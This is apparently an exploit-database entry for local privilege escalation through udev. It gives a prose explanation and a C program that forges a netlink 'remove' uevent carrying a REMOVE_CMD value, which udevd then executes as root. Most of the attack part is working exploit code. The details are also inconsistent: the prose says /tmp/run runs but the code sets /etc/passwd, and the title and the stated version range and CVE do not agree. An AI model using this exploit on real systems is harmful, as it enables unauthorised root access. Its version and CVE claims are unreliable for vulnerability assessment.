Linux Kernel 4.8.0 UDEV < 232 - Privilege Escalation
Source: wassline@gmail.com  Author: Asrir  Published: 2017-04-18
/*
# Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# The full Research: https://www.facebook.com/asrirnassim/
# CVE: CVE-2017-7874
 
# Exp #
 
First of all, we need some basic information about udev and how it works.

The udev daemon is responsible for receiving device events from the kernel,

and these events are delivered to udev via netlink (a socket family).

You can read more about udev at: https://en.wikipedia.org/wiki/Udev

# Exploit #

The udev vulnerability resulted from a lack of verification of the netlink message source in udevd.

Read the lines in: /lib/udev/rules.d/50-udev-default.rules

All we need is this rule: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"

This rule allows execution of arbitrary commands.

In our exploit we specify a malicious REMOVE_CMD, which causes privileged execution of the attacker-controlled /tmp/run file.

Get your udev version:

Execute: $ udevadm --version

//output: 232

Versions < 232 may also be vulnerable.
*/
 
 
 
// gcc rootme.c -o rootme
// ./rootme <pid>        (argv[1] is the netlink destination pid; the original
//                        note reported a segmentation fault when it was omitted)

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int
main(int argc, char **argv)
{
  int sock;
  char *mp;
  char message[4096];
  struct msghdr msg;
  struct iovec iovector;
  struct sockaddr_nl address;

  /* the original dereferenced argv[1] unchecked, hence the segfault noted above */
  if (argc < 2) {
    fprintf(stderr, "usage: %s <pid>\n", argv[0]);
    return 1;
  }

  /* netlink address: the pid given on the command line, no multicast groups */
  memset(&address, 0, sizeof(address));
  address.nl_family = AF_NETLINK;
  address.nl_pid = atoi(argv[1]);
  address.nl_groups = 0;

  /* msghdr must be zeroed: msg_control and msg_flags were left uninitialised */
  memset(&msg, 0, sizeof(msg));
  msg.msg_name = (void*)&address;
  msg.msg_namelen = sizeof(address);
  msg.msg_iov = &iovector;
  msg.msg_iovlen = 1;

  sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
  if (sock < 0) {
    perror("socket");
    return 1;
  }
  if (bind(sock, (struct sockaddr *) &address, sizeof(address)) < 0) {
    perror("bind");
    close(sock);
    return 1;
  }

  /* uevent wire format: NUL-separated records, a header first, then KEY=VALUE pairs */
  mp = message;
  mp += sprintf(mp, "a@/d") + 1;
  mp += sprintf(mp, "SUBSYSTEM=block") + 1;
  mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
  mp += sprintf(mp, "TIMEOUT=10") + 1;
  mp += sprintf(mp, "ACTION=remove") + 1;
  mp += sprintf(mp, "REMOVE_CMD=/etc/passwd") + 1;   /* the value the RUN+= rule above executes */

  iovector.iov_base = (void*)message;
  iovector.iov_len = (size_t)(mp - message);

  if (sendmsg(sock, &msg, 0) < 0)
    perror("sendmsg");

  close(sock);

  return 0;
}
 